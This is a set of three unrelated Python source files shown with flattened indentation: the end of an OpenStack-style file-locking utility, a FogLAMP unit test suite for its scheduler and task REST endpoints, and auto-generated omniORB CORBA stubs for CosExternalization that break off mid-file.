lock = InterProcessLock(lock_file_path)
with lock:
LOG.debug(_('Got file lock "%(lock)s" at '
'%(path)s for method '
'"%(method)s"...'),
{'lock': name,
'path': lock_file_path,
'method': f.__name__})
retval = f(*args, **kwargs)
finally:
LOG.debug(_('Released file lock "%(lock)s" at '
'%(path)s for method "%(method)s"...'),
{'lock': name,
'path': lock_file_path,
'method': f.__name__})
# NOTE(vish): This removes the tempdir if we needed
# to create one. This is used to
# cleanup the locks left behind by unit
# tests.
if cleanup_dir:
shutil.rmtree(local_lock_path)
else:
retval = f(*args, **kwargs)
finally:
local.strong_store.locks_held.remove(name)
return retval
return inner
return wrap
def synchronized_with_prefix(lock_file_prefix):
"""Partial object generator for the synchronization decorator.
Redefine @synchronized in each project like so::
(in nova/utils.py)
from nova.openstack.common import lockutils
synchronized = lockutils.synchronized_with_prefix('nova-')
(in nova/foo.py)
from nova import utils
@utils.synchronized('mylock')
def bar(self, *args):
...
The lock_file_prefix argument is used to provide lock files on disk with a
meaningful prefix. The prefix should end with a hyphen ('-') if specified.
"""
return functools.partial(synchronized, lock_file_prefix=lock_file_prefix)
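# Editor's illustrative sketch, not part of the original module.  The lock
# name and prefix below are hypothetical; passing external=True would also
# serialize callers across processes via a lock file under CONF.lock_path
# (or a temporary directory if that option is unset).
@synchronized('example-lock', 'example-')
def _example_synchronized_call():
    # Only one green thread executes this body at a time for 'example-lock'.
    pass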
|
|
# -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
import asyncio
import json
from unittest.mock import MagicMock, patch, call
from datetime import timedelta, datetime
import uuid
import pytest
from aiohttp import web
from foglamp.services.core import routes
from foglamp.services.core import connect
from foglamp.common.storage_client.storage_client import StorageClientAsync
from foglamp.services.core import server
from foglamp.services.core.scheduler.scheduler import Scheduler
from foglamp.services.core.scheduler.entities import ScheduledProcess, Task, IntervalSchedule, TimedSchedule, StartUpSchedule, ManualSchedule
from foglamp.services.core.scheduler.exceptions import *
__author__ = "Vaibhav Singhal"
__copyright__ = "Copyright (c) 2017 OSIsoft, LLC"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
@asyncio.coroutine
def mock_coro_response(*args, **kwargs):
if len(args) > 0:
return args[0]
else:
return ""
@pytest.allure.feature("unit")
@pytest.allure.story("core", "api", "schedule")
class TestScheduledProcesses:
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
def setup_method(self):
server.Server.scheduler = Scheduler(None, None)
def teardown_method(self):
server.Server.scheduler = None
async def test_get_scheduled_processes(self, client):
async def mock_coro():
processes = []
process = ScheduledProcess()
process.name = "foo"
process.script = "bar"
processes.append(process)
return processes
with patch.object(server.Server.scheduler, 'get_scheduled_processes', return_value=mock_coro()):
resp = await client.get('/foglamp/schedule/process')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'processes': ['foo']} == json_response
async def test_get_scheduled_process(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
payload = '{"return": ["name"], "where": {"column": "name", "condition": "in", "value": ["purge"]}}'
response = {'rows': [{'name': 'purge'}], 'count': 1}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
return_value=mock_coro_response(response)) as mock_storage_call:
resp = await client.get('/foglamp/schedule/process/purge')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert 'purge' == json_response
mock_storage_call.assert_called_with('scheduled_processes', payload)
async def test_get_scheduled_process_bad_data(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'rows': [], 'count': 0}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload',
return_value=mock_coro_response(response)):
resp = await client.get('/foglamp/schedule/process/bla')
assert 404 == resp.status
assert "No such Scheduled Process: ['bla']." == resp.reason
class TestSchedules:
_random_uuid = uuid.uuid4()
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
def setup_method(self):
server.Server.scheduler = Scheduler(None, None)
def teardown_method(self):
server.Server.scheduler = None
async def test_get_schedules(self, client):
async def mock_coro():
schedules = []
schedule = StartUpSchedule()
schedule.schedule_id = "1"
schedule.exclusive = True
schedule.enabled = True
schedule.name = "foo"
schedule.process_name = "bar"
schedule.repeat = timedelta(seconds=30)
schedule.time = None
schedule.day = None
schedules.append(schedule)
return schedules
with patch.object(server.Server.scheduler, 'get_schedules', return_value=mock_coro()):
resp = await client.get('/foglamp/schedule')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'schedules': [
{'name': 'foo', 'day': None, 'type': 'STARTUP', 'processName': 'bar',
'time': 0, 'id': '1', 'exclusive': True, 'enabled': True, 'repeat': 30.0}
]} == json_response
async def test_get_schedule(self, client):
async def mock_coro():
schedule = StartUpSchedule()
schedule.schedule_id = self._random_uuid
schedule.exclusive = True
schedule.enabled = True
schedule.name = "foo"
schedule.process_name = "bar"
schedule.repeat = timedelta(seconds=30)
schedule.time = None
schedule.day = None
return schedule
with patch.object(server.Server.scheduler, 'get_schedule', return_value=mock_coro()):
resp = await client.get('/foglamp/schedule/{}'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'id': str(self._random_uuid),
'name': 'foo', 'repeat': 30.0, 'enabled': True,
'processName': 'bar', 'type': 'STARTUP', 'day': None,
'time': 0, 'exclusive': True} == json_response
async def test_get_schedule_bad_data(self, client):
resp = await client.get('/foglamp/schedule/{}'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_get_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'get_schedule', side_effect=exception_name):
resp = await client.get('/foglamp/schedule/{}'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
async def test_enable_schedule(self, client):
async def mock_coro():
return True, "Schedule successfully enabled"
with patch.object(server.Server.scheduler, 'enable_schedule', return_value=mock_coro()):
resp = await client.put('/foglamp/schedule/{}/enable'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'status': True, 'message': 'Schedule successfully enabled',
'scheduleId': '{}'.format(self._random_uuid)} == json_response
async def test_enable_schedule_bad_data(self, client):
resp = await client.put('/foglamp/schedule/{}/enable'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_enable_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'enable_schedule', side_effect=exception_name):
resp = await client.put('/foglamp/schedule/{}/enable'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
async def test_disable_schedule(self, client):
async def mock_coro():
return True, "Schedule successfully disabled"
with patch.object(server.Server.scheduler, 'disable_schedule', return_value=mock_coro()):
resp = await client.put('/foglamp/schedule/{}/disable'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'status': True, 'message': 'Schedule successfully disabled',
'scheduleId': '{}'.format(self._random_uuid)} == json_response
async def test_disable_schedule_bad_data(self, client):
resp = await client.put('/foglamp/schedule/{}/disable'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_disable_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'disable_schedule', side_effect=exception_name):
resp = await client.put('/foglamp/schedule/{}/disable'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
@pytest.mark.parametrize("return_queue_task, expected_response", [
(True, {'message': 'Schedule started successfully', 'id': '{}'.format(_random_uuid)}),
(False, {'message': 'Schedule could not be started', 'id': '{}'.format(_random_uuid)}),
])
async def test_start_schedule(self, client, return_queue_task, expected_response):
async def mock_coro():
return ""
async def patch_queue_task(_resp):
return _resp
with patch.object(server.Server.scheduler, 'get_schedule', return_value=mock_coro()) as mock_get_schedule:
with patch.object(server.Server.scheduler, 'queue_task', return_value=patch_queue_task(return_queue_task)) \
as mock_queue_task:
resp = await client.post('/foglamp/schedule/start/{}'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert expected_response == json_response
mock_queue_task.assert_called_once_with(uuid.UUID('{}'.format(self._random_uuid)))
mock_get_schedule.assert_called_once_with(uuid.UUID('{}'.format(self._random_uuid)))
async def test_start_schedule_bad_data(self, client):
resp = await client.post('/foglamp/schedule/start/{}'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(NotReadyError(), 404, ''),
(ValueError, 404, ''),
])
async def test_start_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'get_schedule', side_effect=exception_name):
resp = await client.post('/foglamp/schedule/start/{}'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
@pytest.mark.parametrize("request_data, expected_response", [
({"type": 1, "name": "foo", "process_name": "bar"},
{'schedule': {'type': 'STARTUP', 'day': None, 'name': 'foo', 'exclusive': True, 'enabled': True,
'id': '{}'.format(_random_uuid), 'processName': 'bar', 'time': 0, 'repeat': 0}}),
({"type": 2, "day": 1, "time": 10, "name": "foo", "process_name": "bar"},
{'schedule': {'name': 'foo', 'processName': 'bar', 'time': 10, 'enabled': True,
'id': '{}'.format(_random_uuid), 'repeat': 0, 'exclusive': True, 'day': 1,
'type': 'TIMED'}}),
({"type": 3, "repeat": 15, "name": "foo", "process_name": "bar"},
{'schedule': {'day': None, 'type': 'INTERVAL', 'exclusive': True, 'enabled': True, 'time': 0, 'repeat': 15.0,
'name': 'foo', 'id': '{}'.format(_random_uuid), 'processName': 'bar'}}),
({"type": 4, "name": "foo", "process_name": "bar"},
{'schedule': {'day': None, 'enabled': True, 'repeat': 0, 'id': '{}'.format(_random_uuid),
'type': 'MANUAL', 'name': 'foo', 'exclusive': True, 'processName': 'bar', 'time': 0}}),
])
async def test_post_schedule(self, client, request_data, expected_response):
async def mock_coro():
return ""
async def mock_schedule(_type):
if _type == 1:
schedule = StartUpSchedule()
schedule.repeat = None
schedule.time = None
schedule.day = None
elif _type == 2:
schedule = TimedSchedule()
schedule.repeat = None
schedule.time = datetime(1, 1, 1, 0, 0, 10)
schedule.day = 1
elif _type == 3:
schedule = IntervalSchedule()
schedule.repeat = timedelta(seconds=15)
schedule.time = None
schedule.day = None
else:
schedule = ManualSchedule()
schedule.repeat = None
schedule.time = None
schedule.day = None
schedule.schedule_id = self._random_uuid
schedule.exclusive = True
schedule.enabled = True
schedule.name = "foo"
schedule.process_name = "bar"
return schedule
storage_client_mock = MagicMock(StorageClientAsync)
response = {'rows': [{'name': 'p1'}], 'count': 1}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'save_schedule', return_value=mock_coro()) \
as patch_save_schedule:
with patch.object(server.Server.scheduler, 'get_schedule',
return_value=mock_schedule(request_data["type"])) as patch_get_schedule:
resp = await client.post('/foglamp/schedule', data=json.dumps(request_data))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert expected_response == json_response
                    assert 1 == patch_get_schedule.call_count
                assert 1 == patch_save_schedule.call_count
async def test_post_schedule_bad_param(self, client):
resp = await client.post('/foglamp/schedule', data=json.dumps({'schedule_id': 'bla'}))
assert 400 == resp.status
assert 'Schedule ID not needed for new Schedule.' == resp.reason
@pytest.mark.parametrize("request_data, response_code, error_message, storage_return", [
({"type": 'bla'}, 400, "Error in type: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"day": 'bla'}, 400, "Error in day: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"time": 'bla'}, 400, "Error in time: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"repeat": 'bla'}, 400, "Error in repeat: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Schedule time cannot be empty for TIMED schedule. 1",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "day": 9, "time": 1, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Day must either be None or must be an integer and in range 1-7. 1",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "day": 5, "time": -1, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Time must be an integer and in range 0-86399. 1",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 200}, 400,
"Errors in request: Schedule type error: 200,Schedule name and Process name cannot be empty. 2",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 1, "name": "sch1", "process_name": "p1"}, 404,
"No such Scheduled Process name: p1",
{'rows': [], 'count': 0}),
])
async def test_post_schedule_bad_data(self, client, request_data, response_code, error_message, storage_return):
storage_client_mock = MagicMock(StorageClientAsync)
response = storage_return
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
resp = await client.post('/foglamp/schedule', data=json.dumps(request_data))
assert response_code == resp.status
assert error_message == resp.reason
@pytest.mark.parametrize("request_data, expected_response", [
({"name": "new"},
{'schedule': {'id': '{}'.format(_random_uuid), 'time': 0, 'processName': 'bar', 'repeat': 30.0,
'exclusive': True, 'enabled': True, 'type': 'STARTUP', 'day': None, 'name': 'new'}}),
])
async def test_update_schedule(self, client, request_data, expected_response):
async def mock_coro():
return ""
async def mock_schedule(*args):
schedule = StartUpSchedule()
schedule.schedule_id = self._random_uuid
schedule.exclusive = True
schedule.enabled = True
schedule.process_name = "bar"
schedule.repeat = timedelta(seconds=30)
schedule.time = None
schedule.day = None
if args[0] == 1:
schedule.name = "foo"
else:
schedule.name = "new"
return schedule
storage_client_mock = MagicMock(StorageClientAsync)
response = {'rows': [{'name': 'p1'}], 'count': 1}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'save_schedule', return_value=mock_coro()) \
as patch_save_schedule:
with patch.object(server.Server.scheduler, 'get_schedule',
side_effect=mock_schedule) as patch_get_schedule:
resp = await client.put('/foglamp/schedule/{}'.format(self._random_uuid),
data=json.dumps(request_data))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert expected_response == json_response
assert 2 == patch_get_schedule.call_count
assert call(uuid.UUID(str(self._random_uuid))) == patch_get_schedule.call_args
arguments, kwargs = patch_save_schedule.call_args
assert isinstance(arguments[0], StartUpSchedule)
async def test_update_schedule_bad_param(self, client):
resp = await client.put('/foglamp/schedule/{}'.format("bla"), data=json.dumps({"a": 1}))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
async def test_update_schedule_data_not_exist(self, client):
async def mock_coro():
return ""
with patch.object(server.Server.scheduler, 'get_schedule',
return_value=mock_coro()) as patch_get_schedule:
resp = await client.put('/foglamp/schedule/{}'.format(self._random_uuid), data=json.dumps({"a": 1}))
assert 404 == resp.status
assert 'Schedule not found: {}'.format(self._random_uuid) == resp.reason
patch_get_schedule.assert_called_once_with(uuid.UUID('{}'.format(self._random_uuid)))
@pytest.mark.parametrize("request_data, response_code, error_message, storage_return", [
({"type": 'bla'}, 400, "Error in type: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"day": 'bla'}, 400, "Error in day: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"time": 'bla'}, 400, "Error in time: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"repeat": 'bla'}, 400, "Error in repeat: bla", {'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Schedule time cannot be empty for TIMED schedule.",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "day": 9, "time": 1, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Day must either be None or must be an integer and in range 1-7.",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 2, "day": 5, "time": -1, "name": "sch1", "process_name": "p1"}, 400,
"Errors in request: Time must be an integer and in range 0-86399.",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 200}, 400,
"Errors in request: Schedule type error: 200",
{'rows': [{'name': 'bla'}], 'count': 1}),
({"type": 1, "name": "sch1", "process_name": "p1"}, 404,
"No such Scheduled Process name: p1",
{'rows': [], 'count': 0}),
])
async def test_update_schedule_bad_data(self, client, request_data, response_code, error_message, storage_return):
async def mock_coro():
schedule = StartUpSchedule()
schedule.schedule_id = self._random_uuid
schedule.exclusive = True
schedule.enabled = True
schedule.name = "foo"
schedule.process_name = "bar"
schedule.repeat = timedelta(seconds=30)
schedule.time = None
schedule.day = None
return schedule
storage_client_mock = MagicMock(StorageClientAsync)
response = storage_return
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'get_schedule',
return_value=mock_coro()) as patch_get_schedule:
resp = await client.put('/foglamp/schedule/{}'.format(self._random_uuid),
data=json.dumps(request_data))
assert response_code == resp.status
assert error_message == resp.reason
patch_get_schedule.assert_called_once_with(uuid.UUID(str(self._random_uuid)))
async def test_delete_schedule(self, client):
async def mock_coro():
return True, "Schedule deleted successfully."
with patch.object(server.Server.scheduler, 'delete_schedule', return_value=mock_coro()):
resp = await client.delete('/foglamp/schedule/{}'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'id': '{}'.format(self._random_uuid),
'message': 'Schedule deleted successfully.'} == json_response
async def test_delete_schedule_bad_data(self, client):
resp = await client.delete('/foglamp/schedule/{}'.format("bla"))
assert 404 == resp.status
assert 'Invalid Schedule ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(ScheduleNotFoundError(_random_uuid), 404, 'Schedule not found: {}'.format(_random_uuid)),
(NotReadyError(), 404, ''),
(ValueError, 404, ''),
(RuntimeWarning, 409, "Enabled Schedule {} cannot be deleted.".format(str(_random_uuid))),
])
async def test_delete_schedule_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'delete_schedule', side_effect=exception_name):
resp = await client.delete('/foglamp/schedule/{}'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_schedule_type(self, client):
resp = await client.get('/foglamp/schedule/type')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'scheduleType': [{'name': 'STARTUP', 'index': 1},
{'name': 'TIMED', 'index': 2},
{'name': 'INTERVAL', 'index': 3},
{'name': 'MANUAL', 'index': 4}]} == json_response
class TestTasks:
_random_uuid = uuid.uuid4()
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
def setup_method(self):
server.Server.scheduler = Scheduler(None, None)
def teardown_method(self):
server.Server.scheduler = None
async def test_get_task(self, client):
async def mock_coro():
task = Task()
task.task_id = self._random_uuid
task.state = Task.State.RUNNING
task.start_time = None
task.schedule_name = "bar"
task.process_name = "bar"
task.end_time = None
task.exit_code = 0
task.reason = None
return task
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 1, 'rows': [{'process_name': 'bla'}]}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'get_task', return_value=mock_coro()):
resp = await client.get('/foglamp/task/{}'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'startTime': 'None', 'reason': None,
'endTime': 'None', 'state': 'Running',
'name': 'bar', 'processName': 'bar', 'exitCode': 0,
'id': '{}'.format(self._random_uuid)} == json_response
async def test_get_task_bad_data(self, client):
resp = await client.get('/foglamp/task/{}'.format("bla"))
assert 404 == resp.status
assert 'Invalid Task ID bla' == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(TaskNotFoundError(_random_uuid), 404, 'Task not found: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_get_task_exceptions(self, client, exception_name, response_code, response_message):
with patch.object(server.Server.scheduler, 'get_task', side_effect=exception_name):
resp = await client.get('/foglamp/task/{}'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
@pytest.mark.parametrize("request_params", [
'',
'?limit=1',
'?name=bla',
'?state=running',
'?limit=1&name=bla&state=running',
])
async def test_get_tasks(self, client, request_params):
async def patch_get_tasks():
tasks = []
task = Task()
task.task_id = self._random_uuid
task.state = Task.State.RUNNING
task.start_time = None
task.schedule_name = "bla"
task.process_name = "bla"
task.end_time = None
task.exit_code = 0
task.reason = None
tasks.append(task)
return tasks
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 1, 'rows': [{'process_name': 'bla'}]}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'get_tasks', return_value=patch_get_tasks()):
resp = await client.get('/foglamp/task{}'.format(request_params))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'tasks': [{'state': 'Running', 'id': '{}'.format(self._random_uuid),
'endTime': 'None', 'exitCode': 0,
'startTime': 'None', 'reason': None, 'name': 'bla', 'processName': 'bla'}]} == json_response
@pytest.mark.parametrize("request_params, response_code, response_message", [
('?limit=invalid', 400, "Limit must be a positive integer"),
('?limit=-1', 400, "Limit must be a positive integer"),
('?state=BLA', 400, "This state value 'BLA' not permitted."),
])
async def test_get_tasks_exceptions(self, client, request_params, response_code, response_message):
resp = await client.get('/foglamp/task{}'.format(request_params))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_tasks_no_task_exception(self, client):
async def patch_get_tasks():
tasks = []
return tasks
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 0, 'rows': []}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
with patch.object(server.Server.scheduler, 'get_tasks', return_value=patch_get_tasks()):
resp = await client.get('/foglamp/task{}'.format('?name=bla&state=running'))
assert 404 == resp.status
assert "No Tasks found" == resp.reason
@pytest.mark.parametrize("request_params", ['', '?name=bla'])
async def test_get_tasks_latest(self, client, request_params):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 2, 'rows': [
{'pid': '1', 'reason': '', 'exit_code': '0', 'id': '1',
'process_name': 'bla', 'schedule_name': 'bla', 'end_time': '2018', 'start_time': '2018', 'state': '2'}]}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
resp = await client.get('/foglamp/task/latest{}'.format(request_params))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'tasks': [{'reason': '', 'name': 'bla', 'processName': 'bla',
'state': 'Complete', 'exitCode': '0', 'endTime': '2018',
'pid': '1', 'startTime': '2018', 'id': '1'}]} == json_response
@pytest.mark.parametrize("request_params", ['', '?name=not_exist'])
async def test_get_tasks_latest_no_task_exception(self, client, request_params):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'count': 0, 'rows': []}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(storage_client_mock, 'query_tbl_with_payload', return_value=mock_coro_response(response)):
resp = await client.get('/foglamp/task/latest{}'.format(request_params))
assert 404 == resp.status
assert "No Tasks found" == resp.reason
async def test_cancel_task(self, client):
async def mock_coro():
return "some valid values"
with patch.object(server.Server.scheduler, 'get_task', return_value=mock_coro()):
with patch.object(server.Server.scheduler, 'cancel_task', return_value=mock_coro()):
resp = await client.put('/foglamp/task/{}/cancel'.format(self._random_uuid))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'id': '{}'.format(self._random_uuid),
'message': 'Task cancelled successfully'} == json_response
async def test_cancel_task_bad_data(self, client):
resp = await client.put('/foglamp/task/{}/cancel'.format("bla"))
assert 404 == resp.status
assert 'Invalid Task ID {}'.format("bla") == resp.reason
@pytest.mark.parametrize("exception_name, response_code, response_message", [
(TaskNotFoundError(_random_uuid), 404, 'Task not found: {}'.format(_random_uuid)),
(TaskNotRunningError(_random_uuid), 404, 'Task is not running: {}'.format(_random_uuid)),
(ValueError, 404, ''),
])
async def test_cancel_task_exceptions(self, client, exception_name, response_code, response_message):
async def mock_coro():
return ""
with patch.object(server.Server.scheduler, 'get_task', return_value=mock_coro()):
with patch.object(server.Server.scheduler, 'cancel_task', side_effect=exception_name):
resp = await client.put('/foglamp/task/{}/cancel'.format(self._random_uuid))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_task_state(self, client):
resp = await client.get('/foglamp/task/state')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'taskState': [
{'name': 'Running', 'index': 1},
{'name': 'Complete', 'index': 2},
{'name': 'Canceled', 'index': 3},
{'name': 'Interrupted', 'index': 4}]} == json_response
|
|
# Python stubs generated by omniidl from /usr/local/share/idl/omniORB/COS/CosExternalization.idl
# DO NOT EDIT THIS FILE!
import omniORB, _omnipy
from omniORB import CORBA, PortableServer
_0_CORBA = CORBA
_omnipy.checkVersion(4,2, __file__, 1)
try:
property
except NameError:
def property(*args):
return None
# #include "CosNaming.idl"
import CosNaming_idl
_0_CosNaming = omniORB.openModule("CosNaming")
_0_CosNaming__POA = omniORB.openModule("CosNaming__POA")
# #include "CosLifeCycle.idl"
import CosLifeCycle_idl
_0_CosLifeCycle = omniORB.openModule("CosLifeCycle")
_0_CosLifeCycle__POA = omniORB.openModule("CosLifeCycle__POA")
# #include "CosObjectIdentity.idl"
import CosObjectIdentity_idl
_0_CosObjectIdentity = omniORB.openModule("CosObjectIdentity")
_0_CosObjectIdentity__POA = omniORB.openModule("CosObjectIdentity__POA")
# #include "corbaidl.idl"
import corbaidl_idl
_0_CORBA = omniORB.openModule("CORBA")
_0_CORBA__POA = omniORB.openModule("CORBA__POA")
# #include "boxes.idl"
import boxes_idl
_0_CORBA = omniORB.openModule("CORBA")
_0_CORBA__POA = omniORB.openModule("CORBA__POA")
# #include "ir.idl"
import ir_idl
_0_CORBA = omniORB.openModule("CORBA")
_0_CORBA__POA = omniORB.openModule("CORBA__POA")
# #include "CosRelationships.idl"
import CosRelationships_idl
_0_CosRelationships = omniORB.openModule("CosRelationships")
_0_CosRelationships__POA = omniORB.openModule("CosRelationships__POA")
# #include "CosGraphs.idl"
import CosGraphs_idl
_0_CosGraphs = omniORB.openModule("CosGraphs")
_0_CosGraphs__POA = omniORB.openModule("CosGraphs__POA")
# #include "CosStream.idl"
import CosStream_idl
_0_CosStream = omniORB.openModule("CosStream")
_0_CosStream__POA = omniORB.openModule("CosStream__POA")
#
# Start of module "CosExternalization"
#
__name__ = "CosExternalization"
_0_CosExternalization = omniORB.openModule("CosExternalization", r"/usr/local/share/idl/omniORB/COS/CosExternalization.idl")
_0_CosExternalization__POA = omniORB.openModule("CosExternalization__POA", r"/usr/local/share/idl/omniORB/COS/CosExternalization.idl")
# exception InvalidFileNameError
_0_CosExternalization.InvalidFileNameError = omniORB.newEmptyClass()
class InvalidFileNameError (CORBA.UserException):
_NP_RepositoryId = "IDL:omg.org/CosExternalization/InvalidFileNameError:1.0"
def __init__(self):
CORBA.UserException.__init__(self)
_0_CosExternalization.InvalidFileNameError = InvalidFileNameError
_0_CosExternalization._d_InvalidFileNameError = (omniORB.tcInternal.tv_except, InvalidFileNameError, InvalidFileNameError._NP_RepositoryId, "InvalidFileNameError")
_0_CosExternalization._tc_InvalidFileNameError = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_InvalidFileNameError)
omniORB.registerType(InvalidFileNameError._NP_RepositoryId, _0_CosExternalization._d_InvalidFileNameError, _0_CosExternalization._tc_InvalidFileNameError)
del InvalidFileNameError
# exception ContextAlreadyRegistered
_0_CosExternalization.ContextAlreadyRegistered = omniORB.newEmptyClass()
class ContextAlreadyRegistered (CORBA.UserException):
_NP_RepositoryId = "IDL:omg.org/CosExternalization/ContextAlreadyRegistered:1.0"
def __init__(self):
CORBA.UserException.__init__(self)
_0_CosExternalization.ContextAlreadyRegistered = ContextAlreadyRegistered
_0_CosExternalization._d_ContextAlreadyRegistered = (omniORB.tcInternal.tv_except, ContextAlreadyRegistered, ContextAlreadyRegistered._NP_RepositoryId, "ContextAlreadyRegistered")
_0_CosExternalization._tc_ContextAlreadyRegistered = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_ContextAlreadyRegistered)
omniORB.registerType(ContextAlreadyRegistered._NP_RepositoryId, _0_CosExternalization._d_ContextAlreadyRegistered, _0_CosExternalization._tc_ContextAlreadyRegistered)
